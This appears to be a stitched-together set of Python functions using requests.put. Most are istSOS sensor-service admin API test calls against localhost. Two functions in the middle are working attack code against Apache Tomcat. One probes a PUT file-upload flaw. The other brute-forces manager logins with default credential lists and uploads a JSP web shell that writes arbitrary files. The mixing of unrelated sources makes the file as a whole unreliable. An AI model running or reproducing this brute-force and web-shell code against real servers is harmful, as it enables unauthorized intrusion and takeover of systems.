def services_name_configsections_identification_PUT(pp): print "services/{name}/configsections/identification, PUT" dbname = "demo" put = { "title": "IST Sensor Observation Service 1", "default": False, "abstract": "hydro-meteorological monitoring network", "urnversion": "1.0", "authority": "x-istsos", "fees": "NONE", "keywords": "SOS,IST,SUPSI, test", "accessconstrains": "NONE" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/configsections/identification', data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_configsections_provider_PUT(pp): print "services/{name}/configsections/provider, PUT" dbname = "demo" put = { "contactcountry": "Switzerland", "providername": "South Hampton Institute of Technology", "default": False, "contactposition": "Data manager", "contactvoice": "+41586666200", "contactadminarea": "Canton Ticino", "contactemail": "*****@*****.**", "contactdeliverypoint": "Campus Trevano", "contactname": "Team Geomatica", "contactpostalcode": "6952", "contactcity": "Canobbio", "providersite": "http://www.supsi.ch/ist", "contactfax": "+41586666209" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/configsections/provider', data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_configsections_connection_PUT(pp): print "services/{name}/configsections/connection, PUT" dbname = "demo" put = { "default": False, "dbname": "istsos", "host": "localhost", "user": "******", "password": "******", "port": "5432" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/configsections/connection', data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_uoms_name_PUT(pp): print "services/{name}/uoms/{name}, PUT" dbname = "demo" oname = 'am' put = { "procedures": [], "name": "love", "description": "Love is in the air yesss" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/uoms/' + oname, data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_PUT(pp): print "services/{name}, PUT" dbname = "pippo" put = { "service": "gianni", "dbname": "istsos", "host": "localhost", "user": "******", "password": "******", "port": "5432" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname, data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_observedproperties_name_PUT(pp): print "services/{name}/observedproperties/{name}, PUT" dbname = "demo" oname = 'urn:ogc:def:parameter:x-istsos:1.0:meteo:air:LOVEisintheAIR' put = { "definition": "urn:ogc:def:parameter:x-istsos:1.0:meteo:air:LoveIsInTheAir", "procedures": [], "name": "LoveIsInTheAir", "description": "liquid precipitation or snow water equivalent" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/observedproperties/' + oname, data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_dataqualities_code_PUT(pp): print "services/{name}/dataqualities/{code}, PUT" dbname = "demo" qualcode = '42' put = { "code": 42, "name": "the answer", "description": "Answer to the Life, the Universe, and Everything" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/dataqualities/' + qualcode, data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_offerings_name_PUT(pp): print "services/{name}/offerings/{name}, PUT" dbname = "demo" oname = 'piripicchio' put = { "description": "blablabla", "expiration": "", "active": True, "procedures": 0, "id": 2, "name": "piripicchio" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/offerings/' + oname, data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_configsections_geo_PUT(pp): print "services/{name}/configsections/geo, PUT" dbname = "demo" put = { "zaxisname": "altitude", "default": False, "xaxisname": "easting", "yaxisname": "northing", "allowedepsg": "4326,3857", "istsosepsg": "21781" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/configsections/geo', data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_configsections_getobservation_PUT(pp): print "services/{name}/configsections/getobservation, PUT" dbname = "demo" put = { "default": False, "maxgoperiod": "200", "aggregatenodataqi": "-100", "defaultqi": "100", "aggregatenodata": "-999.9" } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/configsections/getobservation', data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def PUT(fname, sput, address): #print fname + ', PUT' res = requests.put(address, data=json.dumps(sput), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) return res.json
def operations_initialization_PUT(pp): print "operations/initialization, PUT" put = {"level": "2"} res = requests.put( 'http://localhost/istsos/wa/istsos/operations/initialization', data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_configsections_serviceurl_PUT(pp): print "services/{name}/configsections/serviceurl, PUT" dbname = "demo" put = {"default": False, "url": "http://localhost/istsos/demo"} res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/configsections/serviceurl', data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def verify(self, web, user='', pwd='', timeout=10): headers = { "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" } post_data = "this-is-a-test-shell" time_stamp = time.mktime(datetime.datetime.now().timetuple()) m = hashlib.md5(str(time_stamp).encode(encoding='utf-8')) md5_str = m.hexdigest() vulnurl = [] vulnurl.append(web.url + "/" + md5_str + ".jsp::$DATA") vulnurl.append(web.url + "/" + md5_str + ".jsp/") for url in vulnurl: try: req = requests.put(url, data=post_data, headers=headers, timeout=timeout, verify=False) if req.status_code == 201: # and post_data in requests.get(web.url+'/'+md5_str+'.jsp').text: self.bugaddr = url return True except Exception as e: print(e)
def exploit(ip): result = [] if Domain: for domain in Domain: login_url = domain + '/manager/html' try: resp = requests.get( login_url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False) except Exception, e: logging.error(e) continue if resp.status_code == 401: result.append('%s >>>> 存在Tomcat后台' % login_url) flag_list = ['Application Manager', 'Welcome'] user_list = ['admin', 'manager', 'tomcat', 'apache', 'root'] pass_list = [ '', '123456', '12345678', '123456789', 'admin123', '123123', 'admin888', 'password', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'tomcat', 'apache', 'root' ] for user in user_list: for password in pass_list: try: resp = requests.get( login_url, timeout=TIME_OUT, proxies=MY_PROXY, headers={ "User-Agent": random.choice(USER_AGENT_LIST), "Authorization": 'Basic ' + base64.b64encode(user + ":" + password) }, allow_redirects=True, verify=False) except Exception, e: logging.error(e) continue if resp.status_code == 401: continue for flag in flag_list: if flag in resp.text: result.append('%s >>>> 存在Tomcat后台弱漏洞 %s:%s' % (login_url, user, password)) body = """<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>""" #body = '''upload success!''' try: resp = requests.options(domain) if 'allow' in resp.headers and resp.headers['allow'].find( 'PUT') > 0: url = domain + '/success.jsp/' resp_put = requests.put( url, data=body, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, verify=False) if resp_put.status_code == 201: result.append('webshell:' + url[:-1]) elif resp_put.status_code == 204: result.append('%s >>>> 开启了PUT方法且webshell已存在' % domain) else: result.append('%s >>>> 开启了PUT方法' % domain) except Exception, e: logging.error(e) pass
def services_name_configsections_PUT(pp): print "services/{name}/configsections, PUT" dbname = "demo" put = { "getobservation": { "default": True, "maxgoperiod": "200", "aggregatenodataqi": "-100", "defaultqi": "100", "aggregatenodata": "-999.9" }, "urn": { "process": "urn:ogc:def:process:x-istsos:1.0:", "property": "urn:ogc:def:property:x-istsos:1.0:", "offering": "urn:ogc:def:offering:x-istsos:1.0:", "default": True, "sensor": "urn:ogc:def:sensor:x-istsos:1.0:", "phenomena": "urn:ogc:def:phenomenon:x-istsos:1.0:", "feature": "urn:ogc:def:feature:x-istsos:1.0:", "sensorType": "urn:ogc:def:sensorType:x-istsos:1.0:", "dataType": "urn:ogc:def:dataType:x-istsos:1.0:", "role": "urn:role:x-istsos:1.0:", "refsystem": "urn:ogc:crs:EPSG:", "time": "urn:ogc:def:parameter:x-istsos:1.0:time:iso8601", "keywords": "urn:ogc:def:keywords:x-istsos:1.0:", "identifier": "urn:ogc:def:identifier:x-istsos:1.0:", "parameter": "urn:ogc:def:parameter:x-istsos:1.0:", "procedure": "urn:ogc:def:procedure:x-istsos:1.0:" }, "connection": { "default": True, "dbname": "istsos", "host": "localhost", "user": "******", "password": "******", "port": "5432" }, "identification": { "title": "IST Sensor Observation Service 1", "default": False, "abstract": "hydro-meteorological monitoring network", "urnversion": "1.0", "authority": "x-istsos", "fees": "NONE", "keywords": "SOS,IST,SUPSI", "accessconstrains": "NONE" }, "serviceurl": { "default": True, "url": "http://localhost/istsos/pippo" }, "provider": { "contactcountry": "Switzerland", "providername": "Istituto Scienze della Terra", "default": True, "contactposition": "Data manager", "contactvoice": "+41586666200", "contactadminarea": "Canton Ticino", "contactemail": "*****@*****.**", "contactdeliverypoint": "Campus Trevano", "contactname": "Team Geomatica", "contactpostalcode": "6952", "contactcity": "Canobbio", "providersite": "http://www.supsi.ch/ist", "contactfax": "+41586666209" }, "geo": { "zaxisname": "altitude", "default": True, "xaxisname": "easting", "yaxisname": "northing", "allowedepsg": "4326,3857", "istsosepsg": "21781" } } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/configsections', data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"
def services_name_procedures_name_PUT(pp): print "services/{name}/procedures/{name}, PUT" dbname = "demo" pname = 'PIPPO' put = { "inputs": [], "description": "temperature weather station in Usmate Carate", "classification": [{ "definition": "urn:ogc:def:classifier:x-istsos:1.0:systemType", "name": "System Type", "value": "insitu-fixed-point" }, { "definition": "urn:ogc:def:classifier:x-istsos:1.0:sensorType", "name": "Sensor Type", "value": "tipping bucket rain gauge" }], "characteristics": "", "interfaces": "", "keywords": "weather,meteorological,IST, test", "contacts": [], "assignedSensorId": "6ecb65065eccaac8967089df62c81a24", "documentation": [], "system": "PIPPO", "capabilities": [], "identification": [], "location": { "geometry": { "type": "Point", "coordinates": ["8.96127", "46.02723", "344.1"] }, "crs": { "type": "name", "properties": { "name": "EPSG:4326" } }, "type": "Feature", "properties": { "name": "PIPPO" } }, "outputs": [{ "definition": "urn:ogc:def:parameter:x-istsos:1.0:time:iso8601", "constraint": { "max": "", "interval": [ "2013-01-01T00:10:00.000000+0100", "2013-02-05T00:00:00.000000+0100" ], "role": "", "valuelist": "", "min": "" }, "name": "Time", "uom": "", "description": "" }, { "definition": "urn:ogc:def:parameter:x-istsos:1.0:meteo:air:rainfall", "constraint": { "max": "", "interval": "", "role": "", "valuelist": "", "min": "" }, "name": "air-rainfall", "uom": "mm", "description": "" }], "system_id": "PIPPO", "history": [] } res = requests.put('http://localhost/istsos/wa/istsos/services/' + dbname + '/procedures/' + pname, data=json.dumps(put), prefetch=True) try: res.raise_for_status( ) # raise exception if som comunication error occured except Exception as e: print str(e) pp.pprint(res.json) print "\n ************************************ \n"